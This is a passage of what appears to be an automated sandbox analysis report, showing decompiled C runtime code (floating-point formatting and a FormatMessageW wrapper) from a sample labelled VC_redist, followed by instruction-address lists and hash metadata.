                                                                          													 *_t404 = _v936 & 0x00000000;
                                                                          													__eflags =  *_t404;
                                                                          													_push(0);
                                                                          													L190:
                                                                          													_push( &_v2404);
                                                                          													_t823 =  &_v932;
                                                                          													L262:
                                                                          													_push(_t1025);
                                                                          													_push(_t823);
                                                                          													L313();
                                                                          													_t1240 =  &(_t1240[4]);
                                                                          												} else {
                                                                          													goto L182;
                                                                          												}
                                                                          												goto L263;
                                                                          												L182:
                                                                          												_t875 = _v1908 - _v1888;
                                                                          												__eflags = _t875;
                                                                          												_v1908 = _t875;
                                                                          											} while (_t875 != 0);
                                                                          											_t1061 = _v1896;
                                                                          											goto L184;
                                                                          										}
                                                                          									}
                                                                          									L263:
                                                                          									_t1155 = _v1920;
                                                                          									_t1207 = _t1155;
                                                                          									_t1045 = _v472;
                                                                          									_v1872 = _t1207;
                                                                          									__eflags = _t1045;
                                                                          									if(_t1045 != 0) {
                                                                          										_t1211 = 0;
                                                                          										_t1159 = 0;
                                                                          										__eflags = 0;
                                                                          										do {
                                                                          											_t813 =  *(_t1234 + _t1159 * 4 - 0x1d0);
                                                                          											_t1110 = 0xa;
                                                                          											_t1111 = _t813 * _t1110 >> 0x20;
                                                                          											 *(_t1234 + _t1159 * 4 - 0x1d0) = _t813 * _t1110 + _t1211;
                                                                          											asm("adc edx, 0x0");
                                                                          											_t1159 = _t1159 + 1;
                                                                          											_t1211 = _t1111;
                                                                          											__eflags = _t1159 - _t1045;
                                                                          										} while (_t1159 != _t1045);
                                                                          										_v1896 = _t1211;
                                                                          										__eflags = _t1211;
                                                                          										_t1207 = _v1872;
                                                                          										if(_t1211 != 0) {
                                                                          											_t1054 = _v472;
                                                                          											__eflags = _t1054 - 0x73;
                                                                          											if(_t1054 >= 0x73) {
                                                                          												__eflags = 0;
                                                                          												_push(0);
                                                                          												_v2408 = 0;
                                                                          												_v472 = 0;
                                                                          												_push( &_v2404);
                                                                          												_push(_t1025);
                                                                          												_push( &_v468);
                                                                          												L313();
                                                                          												_t1240 =  &(_t1240[4]);
                                                                          											} else {
                                                                          												 *(_t1234 + _t1054 * 4 - 0x1d0) = _t1111;
                                                                          												_v472 = _v472 + 1;
                                                                          											}
                                                                          										}
                                                                          										_t1155 = _t1207;
                                                                          									}
                                                                          									_t787 = E0004A3B0( &_v472,  &_v936);
                                                                          									_t1101 = 0xa;
                                                                          									__eflags = _t787 - _t1101;
                                                                          									if(_t787 != _t1101) {
                                                                          										__eflags = _t787;
                                                                          										if(_t787 != 0) {
                                                                          											_t788 = _t787 + 0x30;
                                                                          											__eflags = _t788;
                                                                          											_t1207 = _t1155 + 1;
                                                                          											 *_t1155 = _t788;
                                                                          											_v1872 = _t1207;
                                                                          											goto L282;
                                                                          										} else {
                                                                          											_t789 = _v1904 - 1;
                                                                          										}
                                                                          									} else {
                                                                          										_v1904 = _v1904 + 1;
                                                                          										_t1207 = _t1155 + 1;
                                                                          										_t805 = _v936;
                                                                          										 *_t1155 = 0x31;
                                                                          										_v1872 = _t1207;
                                                                          										__eflags = _t805;
                                                                          										if(_t805 != 0) {
                                                                          											_t1158 = 0;
                                                                          											_t1210 = _t805;
                                                                          											_t1053 = 0;
                                                                          											__eflags = 0;
                                                                          											do {
                                                                          												_t806 =  *(_t1234 + _t1053 * 4 - 0x3a0);
                                                                          												 *(_t1234 + _t1053 * 4 - 0x3a0) = _t806 * _t1101 + _t1158;
                                                                          												asm("adc edx, 0x0");
                                                                          												_t1053 = _t1053 + 1;
                                                                          												_t1158 = _t806 * _t1101 >> 0x20;
                                                                          												_t1101 = 0xa;
                                                                          												__eflags = _t1053 - _t1210;
                                                                          											} while (_t1053 != _t1210);
                                                                          											_t1207 = _v1872;
                                                                          											__eflags = _t1158;
                                                                          											if(_t1158 != 0) {
                                                                          												_t809 = _v936;
                                                                          												__eflags = _t809 - 0x73;
                                                                          												if(_t809 >= 0x73) {
                                                                          													_push(0);
                                                                          													_v2408 = 0;
                                                                          													_v936 = 0;
                                                                          													_push( &_v2404);
                                                                          													_push(_t1025);
                                                                          													_push( &_v932);
                                                                          													L313();
                                                                          													_t1240 =  &(_t1240[4]);
                                                                          												} else {
                                                                          													 *(_t1234 + _t809 * 4 - 0x3a0) = _t1158;
                                                                          													_v936 = _v936 + 1;
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										L282:
                                                                          										_t789 = _v1904;
                                                                          									}
                                                                          									 *((intOrPtr*)(_v1924 + 4)) = _t789;
                                                                          									_t1031 = _v1916;
                                                                          									__eflags = _t789;
                                                                          									if(_t789 >= 0) {
                                                                          										__eflags = _t1031 - 0x7fffffff;
                                                                          										if(_t1031 <= 0x7fffffff) {
                                                                          											_t1031 = _t1031 + _t789;
                                                                          											__eflags = _t1031;
                                                                          										}
                                                                          									}
                                                                          									_t791 = _a24 - 1;
                                                                          									__eflags = _t791 - _t1031;
                                                                          									if(_t791 >= _t1031) {
                                                                          										_t791 = _t1031;
                                                                          									}
                                                                          									_t792 = _t791 + _v1920;
                                                                          									_v1916 = _t792;
                                                                          									__eflags = _t1207 - _t792;
                                                                          									if(__eflags != 0) {
                                                                          										while(1) {
                                                                          											_t793 = _v472;
                                                                          											__eflags = _t793;
                                                                          											if(__eflags == 0) {
                                                                          												goto L303;
                                                                          											}
                                                                          											_t1156 = 0;
                                                                          											_t1208 = _t793;
                                                                          											_t1049 = 0;
                                                                          											__eflags = 0;
                                                                          											do {
                                                                          												_t794 =  *(_t1234 + _t1049 * 4 - 0x1d0);
                                                                          												 *(_t1234 + _t1049 * 4 - 0x1d0) = _t794 * 0x3b9aca00 + _t1156;
                                                                          												asm("adc edx, 0x0");
                                                                          												_t1049 = _t1049 + 1;
                                                                          												_t1156 = _t794 * 0x3b9aca00 >> 0x20;
                                                                          												__eflags = _t1049 - _t1208;
                                                                          											} while (_t1049 != _t1208);
                                                                          											_t1209 = _v1872;
                                                                          											__eflags = _t1156;
                                                                          											if(_t1156 != 0) {
                                                                          												_t800 = _v472;
                                                                          												__eflags = _t800 - 0x73;
                                                                          												if(_t800 >= 0x73) {
                                                                          													__eflags = 0;
                                                                          													_push(0);
                                                                          													_v2408 = 0;
                                                                          													_v472 = 0;
                                                                          													_push( &_v2404);
                                                                          													_push(_t1025);
                                                                          													_push( &_v468);
                                                                          													L313();
                                                                          													_t1240 =  &(_t1240[4]);
                                                                          												} else {
                                                                          													 *(_t1234 + _t800 * 4 - 0x1d0) = _t1156;
                                                                          													_v472 = _v472 + 1;
                                                                          												}
                                                                          											}
                                                                          											_t799 = E0004A3B0( &_v472,  &_v936);
                                                                          											_t1157 = 8;
                                                                          											_t1031 = _v1916 - _t1209;
                                                                          											__eflags = _t1031;
                                                                          											do {
                                                                          												_t708 = _t799 % _v1912;
                                                                          												_t799 = _t799 / _v1912;
                                                                          												_t1101 = _t708 + 0x30;
                                                                          												__eflags = _t1031 - _t1157;
                                                                          												if(_t1031 >= _t1157) {
                                                                          													 *(_t1157 + _t1209) = _t1101;
                                                                          												}
                                                                          												_t1157 = _t1157 - 1;
                                                                          												__eflags = _t1157 - 0xffffffff;
                                                                          											} while (_t1157 != 0xffffffff);
                                                                          											__eflags = _t1031 - 9;
                                                                          											if(_t1031 > 9) {
                                                                          												_t1031 = 9;
                                                                          											}
                                                                          											_t1207 = _t1209 + _t1031;
                                                                          											_v1872 = _t1207;
                                                                          											__eflags = _t1207 - _v1916;
                                                                          											if(__eflags != 0) {
                                                                          												continue;
                                                                          											}
                                                                          											goto L303;
                                                                          										}
                                                                          									}
                                                                          									L303:
                                                                          									 *_t1207 = 0;
                                                                          									goto L309;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t1031 = _t1195 & 0x000fffff;
                                                                          					if((_t1145 | _t1195 & 0x000fffff) != 0) {
                                                                          						goto L5;
                                                                          					} else {
                                                                          						_push(0x7343c);
                                                                          						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
                                                                          						L308:
                                                                          						_push(_a24);
                                                                          						_push(_t1016);
                                                                          						if(E000451A2() != 0) {
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							E00043D8A();
                                                                          							asm("int3");
                                                                          							_push(_t1234);
                                                                          							_push(_t1195);
                                                                          							_t1196 = _v2424;
                                                                          							__eflags = _t1196;
                                                                          							if(_t1196 != 0) {
                                                                          								_t740 = _v0;
                                                                          								__eflags = _t740;
                                                                          								if(_t740 != 0) {
                                                                          									_push(_t1145);
                                                                          									_t1146 = _a8;
                                                                          									__eflags = _t1146;
                                                                          									if(_t1146 == 0) {
                                                                          										L320:
                                                                          										E0003F670(_t1146, _t740, 0, _a4);
                                                                          										__eflags = _t1146;
                                                                          										if(_t1146 != 0) {
                                                                          											__eflags = _a4 - _t1196;
                                                                          											if(_a4 >= _t1196) {
                                                                          												_t742 = 0x16;
                                                                          											} else {
                                                                          												_t743 = E00043E36();
                                                                          												_push(0x22);
                                                                          												goto L324;
                                                                          											}
                                                                          										} else {
                                                                          											_t743 = E00043E36();
                                                                          											_push(0x16);
                                                                          											L324:
                                                                          											_pop(_t1198);
                                                                          											 *_t743 = _t1198;
                                                                          											E00043D7A();
                                                                          											_t742 = _t1198;
                                                                          										}
                                                                          									} else {
                                                                          										__eflags = _a4 - _t1196;
                                                                          										if(_a4 < _t1196) {
                                                                          											goto L320;
                                                                          										} else {
                                                                          											E0003F0F0(_t740, _t1146, _t1196);
                                                                          											_t742 = 0;
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_t746 = E00043E36();
                                                                          									_t1199 = 0x16;
                                                                          									 *_t746 = _t1199;
                                                                          									E00043D7A();
                                                                          									_t742 = _t1199;
                                                                          								}
                                                                          							} else {
                                                                          								_t742 = 0;
                                                                          							}
                                                                          							return _t742;
                                                                          						} else {
                                                                          							L309:
                                                                          							_t1247 = _v1936;
                                                                          							_pop(_t1148);
                                                                          							_pop(_t1200);
                                                                          							_pop(_t1017);
                                                                          							if(_v1936 != 0) {
                                                                          								E0004C6AE(_t1031, _t1247,  &_v1944);
                                                                          							}
                                                                          							return E0003DE36(_t1017, _v8 ^ _t1234, _t1101, _t1148, _t1200);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          			}




































































































































































































































































                                                                          0x0004ad8d
                                                                          0x0004ad8d
                                                                          0x0004ad8f
                                                                          0x0004ad94
                                                                          0x0004ad95
                                                                          0x0004ad9b
                                                                          0x0004ada7
                                                                          0x0004adae
                                                                          0x0004adaf
                                                                          0x0004adb0
                                                                          0x0004adb5
                                                                          0x0004aca1
                                                                          0x0004aca1
                                                                          0x0004aca3
                                                                          0x00000000
                                                                          0x0004aca9
                                                                          0x0004acab
                                                                          0x0004acac
                                                                          0x0004acae
                                                                          0x0004acb0
                                                                          0x0004acb2
                                                                          0x0004acb2
                                                                          0x0004acb8
                                                                          0x0004acba
                                                                          0x0004acc0
                                                                          0x0004acc3
                                                                          0x0004acd1
                                                                          0x0004acd7
                                                                          0x0004acd7
                                                                          0x0004acd9
                                                                          0x0004acdc
                                                                          0x0004ace2
                                                                          0x0004ace2
                                                                          0x0004ace4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004ace6
                                                                          0x0004ace8
                                                                          0x0004acee
                                                                          0x0004acee
                                                                          0x0004acea
                                                                          0x0004acea
                                                                          0x0004acea
                                                                          0x0004acf3
                                                                          0x0004acf5
                                                                          0x0004acfc
                                                                          0x0004acfc
                                                                          0x0004acf7
                                                                          0x0004acf7
                                                                          0x0004acf7
                                                                          0x0004ad22
                                                                          0x0004ad28
                                                                          0x0004ad2b
                                                                          0x0004ad31
                                                                          0x0004ad38
                                                                          0x0004ad39
                                                                          0x0004ad3a
                                                                          0x0004ad40
                                                                          0x0004ad43
                                                                          0x0004ad45
                                                                          0x00000000
                                                                          0x0004ad45
                                                                          0x00000000
                                                                          0x0004ad43
                                                                          0x0004ad4d
                                                                          0x0004ad53
                                                                          0x0004ad5b
                                                                          0x0004ad5b
                                                                          0x0004ad5c
                                                                          0x0004ad5e
                                                                          0x0004ad62
                                                                          0x0004ad6a
                                                                          0x0004ad6a
                                                                          0x0004ad6a
                                                                          0x0004ad6c
                                                                          0x0004ad73
                                                                          0x0004ad78
                                                                          0x0004ad85
                                                                          0x0004ad7a
                                                                          0x0004ad7d
                                                                          0x0004ad7d
                                                                          0x0004ad78
                                                                          0x0004aca3
                                                                          0x0004adb8
                                                                          0x0004adc2
                                                                          0x0004adc8
                                                                          0x0004adce
                                                                          0x0004add4
                                                                          0x0004aa10
                                                                          0x0004aa10
                                                                          0x0004aa10
                                                                          0x0004aa12
                                                                          0x0004aa19
                                                                          0x0004aa20
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004aa26
                                                                          0x0004aa29
                                                                          0x0004aa2c
                                                                          0x00000000
                                                                          0x0004aa2e
                                                                          0x0004aa36
                                                                          0x0004aa3b
                                                                          0x0004aa40
                                                                          0x0004aa41
                                                                          0x0004aa43
                                                                          0x0004aa4b
                                                                          0x0004aa4f
                                                                          0x0004aa55
                                                                          0x0004aa5b
                                                                          0x0004aa60
                                                                          0x0004aa67
                                                                          0x0004aa67
                                                                          0x0004aa68
                                                                          0x0004aa6b
                                                                          0x0004aa73
                                                                          0x0004aa79
                                                                          0x0004aa7e
                                                                          0x0004aa7e
                                                                          0x0004aa7b
                                                                          0x0004aa7b
                                                                          0x0004aa7b
                                                                          0x0004aa82
                                                                          0x0004aa83
                                                                          0x0004aa85
                                                                          0x0004aa88
                                                                          0x0004aa8e
                                                                          0x0004aa94
                                                                          0x0004aa97
                                                                          0x0004aa9a
                                                                          0x0004aaa0
                                                                          0x0004aaa3
                                                                          0x0004aaa6
                                                                          0x0004aab0
                                                                          0x0004aab0
                                                                          0x0004aab0
                                                                          0x0004aaa8
                                                                          0x0004aaa8
                                                                          0x0004aaaa
                                                                          0x00000000
                                                                          0x0004aaac
                                                                          0x0004aaac
                                                                          0x0004aaac
                                                                          0x0004aaaa
                                                                          0x0004aab2
                                                                          0x0004aab4
                                                                          0x0004aba9
                                                                          0x0004aba9
                                                                          0x0004abab
                                                                          0x0004abb0
                                                                          0x0004abb1
                                                                          0x0004abb7
                                                                          0x0004abc3
                                                                          0x0004abca
                                                                          0x0004abcb
                                                                          0x0004abcc
                                                                          0x0004abd1
                                                                          0x0004aaba
                                                                          0x0004aaba
                                                                          0x0004aabc
                                                                          0x00000000
                                                                          0x0004aac2
                                                                          0x0004aac4
                                                                          0x0004aac5
                                                                          0x0004aac7
                                                                          0x0004aac9
                                                                          0x0004aacb
                                                                          0x0004aacb
                                                                          0x0004aad1
                                                                          0x0004aad3
                                                                          0x0004aad9
                                                                          0x0004aadc
                                                                          0x0004aaea
                                                                          0x0004aaf0
                                                                          0x0004aaf0
                                                                          0x0004aaf2
                                                                          0x0004aaf5
                                                                          0x0004aafb
                                                                          0x0004aafb
                                                                          0x0004aafd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004aaff
                                                                          0x0004ab01
                                                                          0x0004ab07
                                                                          0x0004ab07
                                                                          0x0004ab03
                                                                          0x0004ab03
                                                                          0x0004ab03
                                                                          0x0004ab0c
                                                                          0x0004ab0e
                                                                          0x0004ab1b
                                                                          0x0004ab1b
                                                                          0x0004ab10
                                                                          0x0004ab16
                                                                          0x0004ab16
                                                                          0x0004ab39
                                                                          0x0004ab41
                                                                          0x0004ab48
                                                                          0x0004ab4f
                                                                          0x0004ab50
                                                                          0x0004ab53
                                                                          0x0004ab59
                                                                          0x0004ab5f
                                                                          0x0004ab62
                                                                          0x0004ab64
                                                                          0x00000000
                                                                          0x0004ab64
                                                                          0x00000000
                                                                          0x0004ab62
                                                                          0x0004ab6c
                                                                          0x0004ab72
                                                                          0x0004ab72
                                                                          0x0004ab78
                                                                          0x0004ab7a
                                                                          0x0004ab84
                                                                          0x0004ab86
                                                                          0x0004ab86
                                                                          0x0004ab86
                                                                          0x0004ab88
                                                                          0x0004ab8f
                                                                          0x0004ab94
                                                                          0x0004aba1
                                                                          0x0004ab96
                                                                          0x0004ab99
                                                                          0x0004ab99
                                                                          0x0004ab94
                                                                          0x0004aabc
                                                                          0x0004abd4
                                                                          0x0004abdf
                                                                          0x0004abe0
                                                                          0x0004abe1
                                                                          0x0004abe7
                                                                          0x0004abed
                                                                          0x0004abf3
                                                                          0x0004abf3
                                                                          0x00000000
                                                                          0x0004aa2c
                                                                          0x00000000
                                                                          0x0004aa12
                                                                          0x0004abf4
                                                                          0x0004abfa
                                                                          0x0004ac01
                                                                          0x0004ac02
                                                                          0x0004ac03
                                                                          0x0004ac08
                                                                          0x0004ac08
                                                                          0x0004b06c
                                                                          0x0004b076
                                                                          0x0004b077
                                                                          0x0004b07d
                                                                          0x0004b07f
                                                                          0x0004b4e8
                                                                          0x0004b4ea
                                                                          0x0004b4ec
                                                                          0x0004b4f2
                                                                          0x0004b4f4
                                                                          0x0004b4fa
                                                                          0x0004b4fc
                                                                          0x0004b84e
                                                                          0x0004b84e
                                                                          0x0004b850
                                                                          0x0004b856
                                                                          0x0004b85d
                                                                          0x0004b863
                                                                          0x0004b865
                                                                          0x0004b903
                                                                          0x0004b903
                                                                          0x0004b905
                                                                          0x0004b906
                                                                          0x0004b90c
                                                                          0x00000000
                                                                          0x0004b86b
                                                                          0x0004b86b
                                                                          0x0004b86e
                                                                          0x0004b874
                                                                          0x0004b87a
                                                                          0x0004b87c
                                                                          0x0004b882
                                                                          0x0004b884
                                                                          0x0004b884
                                                                          0x0004b886
                                                                          0x0004b886
                                                                          0x0004b88f
                                                                          0x0004b896
                                                                          0x0004b89c
                                                                          0x0004b89f
                                                                          0x0004b8a0
                                                                          0x0004b8a2
                                                                          0x0004b8a2
                                                                          0x0004b8a6
                                                                          0x0004b8a8
                                                                          0x0004b8aa
                                                                          0x0004b8b0
                                                                          0x0004b8b3
                                                                          0x00000000
                                                                          0x0004b8b5
                                                                          0x0004b8b5
                                                                          0x0004b8bc
                                                                          0x0004b8bc
                                                                          0x0004b8b3
                                                                          0x0004b8a8
                                                                          0x0004b87c
                                                                          0x0004b86e
                                                                          0x0004b865
                                                                          0x0004b502
                                                                          0x0004b502
                                                                          0x0004b502
                                                                          0x0004b505
                                                                          0x0004b509
                                                                          0x0004b509
                                                                          0x0004b50a
                                                                          0x0004b51c
                                                                          0x0004b529
                                                                          0x0004b538
                                                                          0x0004b562
                                                                          0x0004b567
                                                                          0x0004b56d
                                                                          0x0004b570
                                                                          0x0004b576
                                                                          0x0004b579
                                                                          0x0004b612
                                                                          0x0004b619
                                                                          0x0004b697
                                                                          0x0004b69d
                                                                          0x0004b6a3
                                                                          0x0004b6a6
                                                                          0x0004b6a8
                                                                          0x0004b731
                                                                          0x0004b37e
                                                                          0x0004b380
                                                                          0x0004b382
                                                                          0x0004b382
                                                                          0x0004b382
                                                                          0x0004b38a
                                                                          0x0004b38d
                                                                          0x0004b38d
                                                                          0x0004b393
                                                                          0x0004b395
                                                                          0x0004b397
                                                                          0x0004b39e
                                                                          0x0004b3a4
                                                                          0x0004b3a6
                                                                          0x00000000
                                                                          0x0004b3a6
                                                                          0x00000000
                                                                          0x0004b378
                                                                          0x00000000
                                                                          0x0004b371
                                                                          0x00000000
                                                                          0x0004b315
                                                                          0x0004b2d8
                                                                          0x0004b2d8
                                                                          0x0004b2da
                                                                          0x0004b2e0
                                                                          0x0004b2e7
                                                                          0x0004b2e7
                                                                          0x0004b2ea
                                                                          0x0004b2ea
                                                                          0x00000000
                                                                          0x0004b2da
                                                                          0x00000000
                                                                          0x0004b3be
                                                                          0x0004b3be
                                                                          0x0004b3bf
                                                                          0x0004b3bf
                                                                          0x00000000
                                                                          0x0004b2c4
                                                                          0x0004b19d
                                                                          0x0004b19d
                                                                          0x0004b1a8
                                                                          0x0004b1af
                                                                          0x0004b1b5
                                                                          0x0004b1bc
                                                                          0x0004b1bd
                                                                          0x0004b1be
                                                                          0x0004b1c3
                                                                          0x0004b1c6
                                                                          0x0004b1c8
                                                                          0x0004b1e4
                                                                          0x0004b1e7
                                                                          0x00000000
                                                                          0x0004b1ed
                                                                          0x0004b1ed
                                                                          0x0004b1f4
                                                                          0x00000000
                                                                          0x0004b1fa
                                                                          0x0004b200
                                                                          0x0004b202
                                                                          0x0004b208
                                                                          0x0004b208
                                                                          0x0004b20a
                                                                          0x0004b20a
                                                                          0x0004b20c
                                                                          0x0004b215
                                                                          0x0004b21c
                                                                          0x0004b21f
                                                                          0x0004b220
                                                                          0x0004b222
                                                                          0x0004b222
                                                                          0x00000000
                                                                          0x0004b20a
                                                                          0x0004b1f4
                                                                          0x0004b1ca
                                                                          0x0004b1cc
                                                                          0x0004b1d2
                                                                          0x0004b1d8
                                                                          0x0004b1d9
                                                                          0x00000000
                                                                          0x0004b1d9
                                                                          0x0004b1c8
                                                                          0x0004b116
                                                                          0x0004b116
                                                                          0x0004b11c
                                                                          0x0004b11e
                                                                          0x0004b133
                                                                          0x0004b136
                                                                          0x00000000
                                                                          0x0004b13c
                                                                          0x0004b13c
                                                                          0x0004b143
                                                                          0x00000000
                                                                          0x0004b149
                                                                          0x0004b14f
                                                                          0x0004b151
                                                                          0x0004b157
                                                                          0x0004b157
                                                                          0x0004b159
                                                                          0x0004b159
                                                                          0x0004b15b
                                                                          0x0004b164
                                                                          0x0004b16b
                                                                          0x0004b16e
                                                                          0x0004b16f
                                                                          0x0004b171
                                                                          0x0004b171
                                                                          0x0004b22a
                                                                          0x0004b22a
                                                                          0x0004b22c
                                                                          0x00000000
                                                                          0x0004b232
                                                                          0x0004b232
                                                                          0x0004b238
                                                                          0x0004b23b
                                                                          0x0004b17e
                                                                          0x0004b185
                                                                          0x00000000
                                                                          0x0004b241
                                                                          0x0004b243
                                                                          0x0004b249
                                                                          0x0004b24f
                                                                          0x0004b250
                                                                          0x0004b447
                                                                          0x0004b447
                                                                          0x0004b44e
                                                                          0x0004b44f
                                                                          0x0004b450
                                                                          0x0004b455
                                                                          0x0004b458
                                                                          0x0004b458
                                                                          0x0004b23b
                                                                          0x0004b22c
                                                                          0x0004b143
                                                                          0x0004b120
                                                                          0x0004b120
                                                                          0x0004b122
                                                                          0x0004b128
                                                                          0x0004b3d2
                                                                          0x0004b3d2
                                                                          0x0004b3d3
                                                                          0x0004b3d9
                                                                          0x0004b3d9
                                                                          0x0004b3e0
                                                                          0x0004b3e1
                                                                          0x0004b3e2
                                                                          0x0004b3e7
                                                                          0x0004b3ea
                                                                          0x0004b3ea
                                                                          0x0004b3ea
                                                                          0x0004b11e
                                                                          0x0004b3ec
                                                                          0x0004b3ec
                                                                          0x0004b3ee
                                                                          0x0004b45c
                                                                          0x0004b463
                                                                          0x0004b463
                                                                          0x0004b463
                                                                          0x0004b46a
                                                                          0x0004b46c
                                                                          0x0004b472
                                                                          0x0004b473
                                                                          0x0004b91f
                                                                          0x0004b91f
                                                                          0x0004b920
                                                                          0x0004b921
                                                                          0x0004b926
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004b3f0
                                                                          0x0004b3f6
                                                                          0x0004b3f6
                                                                          0x0004b3fc
                                                                          0x0004b3fc
                                                                          0x0004b408
                                                                          0x00000000
                                                                          0x0004b408
                                                                          0x0004b097
                                                                          0x0004b929
                                                                          0x0004b929
                                                                          0x0004b92f
                                                                          0x0004b931
                                                                          0x0004b937
                                                                          0x0004b93d
                                                                          0x0004b93f
                                                                          0x0004b941
                                                                          0x0004b943
                                                                          0x0004b943
                                                                          0x0004b945
                                                                          0x0004b945
                                                                          0x0004b94e
                                                                          0x0004b94f
                                                                          0x0004b953
                                                                          0x0004b95a
                                                                          0x0004b95d
                                                                          0x0004b95e
                                                                          0x0004b960
                                                                          0x0004b960
                                                                          0x0004b964
                                                                          0x0004b96a
                                                                          0x0004b96c
                                                                          0x0004b972
                                                                          0x0004b974
                                                                          0x0004b97a
                                                                          0x0004b97d
                                                                          0x0004b990
                                                                          0x0004b992
                                                                          0x0004b993
                                                                          0x0004b999
                                                                          0x0004b9a5
                                                                          0x0004b9ac
                                                                          0x0004b9ad
                                                                          0x0004b9ae
                                                                          0x0004b9b3
                                                                          0x0004b97f
                                                                          0x0004b981
                                                                          0x0004b988
                                                                          0x0004b988
                                                                          0x0004b97d
                                                                          0x0004b9b6
                                                                          0x0004b9b6
                                                                          0x0004b9c6
                                                                          0x0004b9cf
                                                                          0x0004b9d0
                                                                          0x0004b9d2
                                                                          0x0004ba69
                                                                          0x0004ba6b
                                                                          0x0004ba76
                                                                          0x0004ba76
                                                                          0x0004ba78
                                                                          0x0004ba7b
                                                                          0x0004ba7d
                                                                          0x00000000
                                                                          0x0004ba6d
                                                                          0x0004ba73
                                                                          0x0004ba73
                                                                          0x0004b9d8
                                                                          0x0004b9d8
                                                                          0x0004b9de
                                                                          0x0004b9e1
                                                                          0x0004b9e7
                                                                          0x0004b9ea
                                                                          0x0004b9f0
                                                                          0x0004b9f2
                                                                          0x0004b9f8
                                                                          0x0004b9fa
                                                                          0x0004b9fc
                                                                          0x0004b9fc
                                                                          0x0004b9fe
                                                                          0x0004b9fe
                                                                          0x0004ba0b
                                                                          0x0004ba12
                                                                          0x0004ba15
                                                                          0x0004ba16
                                                                          0x0004ba18
                                                                          0x0004ba19
                                                                          0x0004ba19
                                                                          0x0004ba1d
                                                                          0x0004ba23
                                                                          0x0004ba25
                                                                          0x0004ba27
                                                                          0x0004ba2d
                                                                          0x0004ba30
                                                                          0x0004ba43
                                                                          0x0004ba44
                                                                          0x0004ba4a
                                                                          0x0004ba56
                                                                          0x0004ba5d
                                                                          0x0004ba5e
                                                                          0x0004ba5f
                                                                          0x0004ba64
                                                                          0x0004ba32
                                                                          0x0004ba32
                                                                          0x0004ba39
                                                                          0x0004ba39
                                                                          0x0004ba30
                                                                          0x0004ba25
                                                                          0x0004ba83
                                                                          0x0004ba83
                                                                          0x0004ba83
                                                                          0x0004ba8f
                                                                          0x0004ba92
                                                                          0x0004ba98
                                                                          0x0004ba9a
                                                                          0x0004ba9c
                                                                          0x0004baa2
                                                                          0x0004baa4
                                                                          0x0004baa4
                                                                          0x0004baa4
                                                                          0x0004baa2
                                                                          0x0004baa9
                                                                          0x0004baaa
                                                                          0x0004baac
                                                                          0x0004baae
                                                                          0x0004baae
                                                                          0x0004bab0
                                                                          0x0004bab6
                                                                          0x0004babc
                                                                          0x0004babe
                                                                          0x0004bac4
                                                                          0x0004bac4
                                                                          0x0004baca
                                                                          0x0004bacc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004bad2
                                                                          0x0004bad4
                                                                          0x0004bad6
                                                                          0x0004bad6
                                                                          0x0004bad8
                                                                          0x0004bad8
                                                                          0x0004bae8
                                                                          0x0004baef
                                                                          0x0004baf2
                                                                          0x0004baf3
                                                                          0x0004baf5
                                                                          0x0004baf5
                                                                          0x0004baf9
                                                                          0x0004baff
                                                                          0x0004bb01
                                                                          0x0004bb03
                                                                          0x0004bb09
                                                                          0x0004bb0c
                                                                          0x0004bb1d
                                                                          0x0004bb1f
                                                                          0x0004bb20
                                                                          0x0004bb26

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: __floor_pentium4
                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                          • API String ID: 4168288129-2761157908
                                                                          • Opcode ID: b70070ec48cb169b02f10bbd60054fbf0a334b89d25e576c69d4c9071adfef01
                                                                          • Instruction ID: 11b64fb8df3c4d7de89f7a5e8a39336cefc13da8db6abacf9f2517c9dd929a56
                                                                          • Opcode Fuzzy Hash: b70070ec48cb169b02f10bbd60054fbf0a334b89d25e576c69d4c9071adfef01
                                                                          • Instruction Fuzzy Hash: D2C24AB1E086288FDB65CE28DD407EAB3F9EB45305F1441EAD80DE7241E778AE818F45
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0004FD20(void* __ecx, void* __edi, intOrPtr _a4, void* _a8, long _a12, char* _a16, intOrPtr _a20) {
                                                                          				short _v8;
                                                                          				short _t25;
                                                                          				signed int _t32;
                                                                          				void* _t33;
                                                                          				void* _t34;
                                                                          				void* _t36;
                                                                          				long _t38;
                                                                          
                                                                          				_t36 = __edi;
                                                                          				_t38 = 0;
                                                                          				_v8 = 0;
                                                                          				_t32 = FormatMessageW(0x900, _a8, _a12, 0,  &_v8, 0,  &_a16);
                                                                          				if(_t32 != 0) {
                                                                          					if(_t32 < 2) {
                                                                          						goto L7;
                                                                          					} else {
                                                                          						_t25 = _v8;
                                                                          						_t33 = 0xd;
                                                                          						if(_t33 ==  *((intOrPtr*)(_t25 + _t32 * 2 - 4))) {
                                                                          							_t34 = 0xa;
                                                                          							if(_t34 ==  *((intOrPtr*)(_t25 + _t32 * 2 - 2))) {
                                                                          								 *((short*)(_t25 + _t32 * 2 - 4)) = 0;
                                                                          								goto L7;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					goto L8;
